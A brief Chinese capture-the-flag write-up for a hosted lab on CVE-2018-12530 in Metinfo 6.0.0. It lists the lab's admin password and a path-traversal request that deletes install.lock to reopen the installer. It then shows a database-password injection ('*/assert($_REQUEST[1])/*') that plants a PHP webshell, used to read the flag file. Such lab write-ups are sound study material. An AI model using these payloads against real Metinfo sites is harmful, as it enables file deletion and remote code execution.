春秋云镜 CVE-2018-12530 Metinfo 6.0.0任意文件删除

靶标介绍

Metinfo 6.0.0任意文件删除。后台密码：f2xWcke5KN6pfebu

启动场景

漏洞利用

/admin进入管理后台，admin/f2xWcke5KN6pfebu

/admin/app/batch/csvup.php?fileField=test-1&flienamecsv=../../../config/install.lock

进入安装界面

数据库密码设置为*/assert($_REQUEST[1])/*
http://eci-2zedfy71vtl1rteakacc.cloudeci1.ichunqiu.com/config/config_db.php?1=readfile(%22/flag%22)

得到flag

flag{05fd93e7-d24e-4091-9759-f7cdcba04482}